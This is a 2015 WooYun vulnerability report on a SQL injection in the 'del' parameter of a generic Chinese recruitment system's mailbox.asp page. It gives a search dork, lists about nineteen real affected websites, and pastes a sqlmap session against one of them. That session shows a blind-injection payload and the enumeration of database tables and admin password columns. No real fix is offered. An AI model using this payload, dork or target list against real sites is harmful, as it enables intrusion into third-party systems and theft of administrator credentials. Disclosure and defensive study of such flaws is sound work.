当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095084

漏洞标题:某通用人才系统一处SQL注入

相关厂商:cncert

漏洞作者: 路人甲

提交时间:2015-02-05 18:34

修复时间:2015-05-07 14:00

公开时间:2015-05-07 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-05: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经确认,细节仅向厂商公开
2015-02-09: 细节向第三方安全合作伙伴开放
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

某通用人才系统一处SQL注入

详细说明:

谷歌关键词:inurl:/pmember.asp
漏洞地址:/person/mailbox.asp?del= 参数del存在注入 (该处需要登陆,前台注册即可)
案例地址:
http://www.dlcxdrc.com/person/mailbox.asp?del=
http://www.cxdrc.com/person/mailbox.asp?del=
http://www.lncyrc.com.cn/person/mailbox.asp?del=
http://www.lnbprsrc.com/person/mailbox.asp?del=
http://www.fxrsw.cn/rencai/person/mailbox.asp?del=
http://www.jobch263.com/person/mailbox.asp?del=
http://site.czxh.gov.cn/job/person/mailbox.asp?del=
http://www.lsqjy.cn/lsqjy/person/mailbox.asp?del=
http://www.mlqgwyj.com/person/mailbox.asp?del=
http://www.127mc.com/person/mailbox.asp?del=
http://job0514.com/person/mailbox.asp?del=
http://jianzhuzhuangshirc.97197.com/person/mailbox.asp?del=
http://www.shtongda.com/person/mailbox.asp?del=
http://www.yczjw.cn/person/mailbox.asp?del=
http://mojurencai.48448.com/person/mailbox.asp?del=
http://www.0857zp.com/person/mailbox.asp?del=
http://wangluorencaiwang.99292.com/person/mailbox.asp?del=
http://112.124.28.12/person/mailbox.asp?del=
http://www.120hr.cn/person/mailbox.asp?del=

漏洞证明:

Test:http://www.cxdrc.com/person/mailbox.asp?del=

Place: GET
Parameter: del
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
Payload: del=IIF(9442=9442,13987,1/0)
---
[19:21:02] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:21:02] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[19:21:02] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[19:21:02] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:21:02] [INFO] retrieved:
[19:21:03] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[19:21:03] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[19:21:03] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[19:21:08] [INFO] checking table existence using items from 'D:\python\sqlmap\tx
t\common-tables.txt'
[19:21:08] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[19:21:09] [INFO] starting 9 threads
[19:21:11] [INFO] retrieved: person
[19:21:14] [INFO] retrieved: admin
[19:21:28] [INFO] retrieved: company
[19:21:31] [INFO] retrieved: system
[19:21:42] [INFO] retrieved: ads
[19:21:54] [INFO] retrieved: vote
[19:22:07] [INFO] tried 670/3145 items (21%)
[19:22:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[19:22:10] [INFO] tried 691/3145 items (22%)
[19:22:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[19:23:24] [INFO] tried 1267/3145 items (40%)
[19:23:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[19:24:22] [INFO] tried 1678/3145 items (53%)
[19:24:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
[19:24:36] [INFO] tried 1792/3145 items (57%)
[19:24:36] [INFO] tried 1793/3145 items (57%)[19:24:36] [CRITICAL] connection ti
med out to the target URL or proxy. sqlmap is going to retry the request
[19:24:59] [INFO] retrieved: ad
[19:25:50] [INFO] tried 2547/3145 items (81%)
[19:25:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
[19:26:08] [INFO] tried 2772/3145 items (88%)
[19:26:08] [INFO] tried 2773/3145 items (88%)[19:26:08] [CRITICAL] unable to con
nect to the target URL or proxy. sqlmap is going to retry the request
[19:26:48] [INFO] tried 3145/3145 items (100%)
[19:26:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
Database: Microsoft_Access_masterdb
[7 tables]
+---------+
| ad |
| admin |
| ads |
| company |
| person |
| system |
| vote |
+---------+
[19:26:53] [WARNING] HTTP error codes detected during run:


Place: GET
Parameter: del
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
Payload: del=IIF(9442=9442,13987,1/0)
---
[19:28:28] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:28:28] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q] y
[19:28:35] [INFO] checking column existence using items from 'D:\python\sqlmap\t
xt\common-columns.txt'
[19:28:35] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[19:28:36] [INFO] starting 8 threads
[19:28:37] [INFO] retrieved: id
[19:28:37] [INFO] retrieved: title
[19:28:58] [INFO] retrieved: password
[19:29:32] [INFO] retrieved: adminid
[19:29:41] [INFO] retrieved: admin
[19:30:06] [INFO] tried 825/2454 items (34%)
[19:30:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
[19:31:45] [INFO] tried 1769/2454 items (72%)
[19:31:46] [INFO] tried 1770/2454 items (72%)[19:31:46] [CRITICAL] connection ti
med out to the target URL or proxy. sqlmap is going to retry the request
[19:32:59] [INFO] tried 2454/2454 items (100%)
[19:33:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| admin | non-numeric |
| adminid | numeric |
| id | numeric |
| password | non-numeric |
| title | non-numeric |
+----------+-------------+

修复方案:

..

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-06 13:59

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评论